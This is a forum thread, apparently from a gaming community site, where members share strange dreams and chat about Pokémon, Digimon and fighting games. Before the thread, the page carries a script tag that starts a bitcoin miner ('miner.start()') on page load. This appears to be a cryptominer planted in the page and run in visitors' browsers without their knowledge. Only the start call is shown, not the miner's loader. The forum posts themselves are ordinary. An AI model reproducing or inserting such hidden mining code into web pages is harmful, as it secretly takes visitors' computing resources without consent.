<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitypge projectsmw central

So I had a dream last night...

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
Sturg
Gets his freak on with VGM
First name: sturgyman

Re: So I had a dream last night...

Postby Sturg » 9 months ago

I've had dreams with some form of narration, but not really with music. The narration was usually incoherent anyways.

I have had dreams with unique music my head makes up. I had one dream recently where I was hearing this pretty smooth jazz/ classical rock mash-up.
ImageImage
ImageImageImageImage

Smibbix
ah yes i see

Postby Smibbix » 8 months ago

I had a dream where I was in one of my friend's backyards, but it was all dark and misty. A foggy silhouette of a dude in the distance was stalking me from the fog. Then Bill Nye randomly showed up with huge claws and chased me around screaming, "BILL! BILL! BILL!!!". I've never been the same since that night.
I'm already patchouli

n~yoron nyoro~n

BurntTenda
defeat four ducks
Pronouns: he/him/his

Postby BurntTenda » 2 months ago

I've been having a recurring dream about a book.
I wish I could remember the title so I could look it up.

It may not even exist, unlike the last book I had dreams about.
Something goes here sometime.

KobaBeach
mentally unstable junglist
First name: David
Pronouns: he/they

Postby KobaBeach » 1 month ago

I watched an episode and a half of Pokémon Sun & Moon (the anime, Portuguese dub) before going to bed because I couldn't sleep.

So I had a dream of Pokémon having a new series but it's like crossed over with like every mon series ever and I was like "fuck yes slice of life featuring every single mon series in the world inject that shit straight into my veins", and I distinctly remember like Agumon, BlackAgumon and Guilmon were in CGI to denote that they're data transferred to the real world. I think there was also Monster Hunter (a bumper for Monster Hunter Stories came on, it's airing on the same channel, on that note, Appmon is also still airing there), Monster Rancher and like Klonoa??????? But it was no actual enemy from Klonoa it was a weird fish gun thing that kinda looked like Shiron from Legendz if he was just a head

Also the ending for its Portuguese dub was literally just an arrange of the second ending of the Portuguese Digimon Tamers dub, almost the same lyrics and everything

I want a Super Mon Taisen type game :c
twitter | avatar by kuma

who cares:

Awoo
I came here to awoo at you!

Re: So you had a dream last night...

Postby Awoo » 1 month ago

Digimon had some pretty sweet fighting games back in the day, if that helps...
ワンワン :pal:

KobaBeach
mentally unstable junglist
First name: David
Pronouns: he/they

Re: So you had a dream last night...

Postby KobaBeach » 1 month ago

Awoo wrote: Digimon had some pretty sweet fighting games back in the day, if that helps...
I already play the hell outta Battle Spirit 1&2 and Rumble Arena 1 (too lazy to try out 2 and battle spirit 1.5)

Not to knock fighting games, I loves me some good ol' Street Fighter or SamSho but I just really like plot heavy stuff like Adventure, RPG, Strategy, even something like the Mystery Dungeon series of roguelikes (Torneko, Shiren, Chocobo, Pokémon)

Seeing characters interact is a huge draw when it comes to crossovers for me, I'm a massive nerd

Also did you know that Digimon's first game ever was a V-Pet on the Saturn? And that this was the first appearance of, among others, Gatomon, LadyDevimon, Angewomon, Holydramon and SaberLeomon????????? like holy shit
twitter | avatar by kuma

who cares:

Ashan
The world has become a place
First name: Hayden

Postby Ashan » 1 month ago

I had a dream that I went to see Avengers Endgame and they ended up showing us 3 hours of Charlie Brown holiday specials and it wasn't until it was over I was like "hey, was that the right movie?"

BurntTenda
defeat four ducks

Postby BurntTenda » 1 month ago

Ashan wrote: I had a dream that I went to see Avengers Endgame and they ended up showing us 3 hours of Charlie Brown holiday specials and it wasn't until it was over I was like "hey, was that the right movie?"
Honestly, I'd probably do the same thing in real life

Um
I was going to mention the dream I had last night
But
I forgot what it was
Something goes here sometime.

Awoo
I came here to awoo at you!

Re: So I did have had a dream last night...

Postby Awoo » 1 month ago

I had a dream last night that I went to one of my favorite restaurants in town that I ate at earlier that day before but it took forever to get my food. It was still super delicious.

Cajun food is seriously underrated

ワンワン :pal:

Sebby19

Postby Sebby19 » 3 weeks ago

So not a dream, but I woke up with my pillow case to the left of my hip. And the pillow to my right was missing its case.

I have no memory of this. And taking these cases off and on is not easy, since my pillows are big fat things. Uhm...

The last time I did something in my sleep was chuckling during a family vacation. Almost 19 years ago. It's a little disconcerning...
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official Raocow subscriber # 30,000

Return to “the gazebo”